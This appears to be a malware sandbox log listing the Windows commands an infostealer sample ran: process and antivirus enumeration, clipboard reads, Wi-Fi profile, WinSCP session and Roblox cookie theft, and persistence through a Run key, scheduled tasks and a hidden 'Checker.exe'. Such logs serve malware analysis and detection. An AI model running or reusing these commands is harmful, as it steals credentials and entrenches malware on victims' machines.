C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"3⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""2⤵PID:7612
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"3⤵PID:2296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""2⤵PID:7516
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"3⤵PID:7696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""2⤵PID:7140
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"3⤵PID:6704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""2⤵PID:396
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"3⤵PID:7536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""2⤵PID:3592
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"3⤵PID:8212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dEYuXjeiyfdN_tezmp.ps1""2⤵PID:3780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dEYuXjeiyfdN_tezmp.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:11052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5576
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:11020
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3392
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:3812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7144
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1560
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5780
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7212
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4900
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1616
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3984
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6484
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5880
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5384
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2732
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5292
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:428
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2632
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7968
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3548
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:1888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3296
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4816
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3100
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7804
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6312
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6800
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1912
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6520
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2412
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2180
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5528
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7524
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6020
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3544
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5784
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:224
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:872
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5376
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6080
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5920
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6288
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6100
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:3196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6324
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:380
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4560
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:9468
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1580
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:10712
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6008
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:448
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:10656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2056
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5196
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6016
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3588
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2976
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5464
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4580
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5660
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:728
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5760
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5848
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6508
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5268
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4828
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6240
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8824
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7180
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:11044
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6272
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:9028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8960
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8840
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:1292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8364
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7244
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4628
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1968
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6404
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6700
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6592
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8988
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2348
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4036
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4844
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:10204
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6172
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8380
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6620
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:8000
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "mullvad account get"2⤵PID:7996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""2⤵PID:6780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "function Get-AntiVirusProduct {3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:5884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Suspicious behavior: EnumeratesProcesses
PID:10564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"2⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:8624 -
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:8596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""2⤵PID:1564
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"3⤵PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵PID:7408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"2⤵PID:3120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
PID:8952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupZ36eyA /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe /f"2⤵PID:8592
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupZ36eyA /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe /f3⤵PID:6200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest"2⤵PID:8064
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest3⤵PID:6364
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupZ36eyA /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\" /F /rl highest4⤵
- Scheduled Task/Job: Scheduled Task
PID:8032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\"""2⤵
- Hide Artifacts: Hidden Files and Directories
PID:7860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe\""3⤵
- Hide Artifacts: Hidden Files and Directories
PID:3064 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Checker.exe4⤵
- Views/modifies file attributes
PID:1900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Checker.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""2⤵PID:2936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "3⤵
- Command and Scripting Interpreter: PowerShell
PID:10472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5584
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵
- Clipboard Data
PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:3808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:9796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:6380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:8188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:7156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:7496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵
- Clipboard Data
PID:10556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7996
-
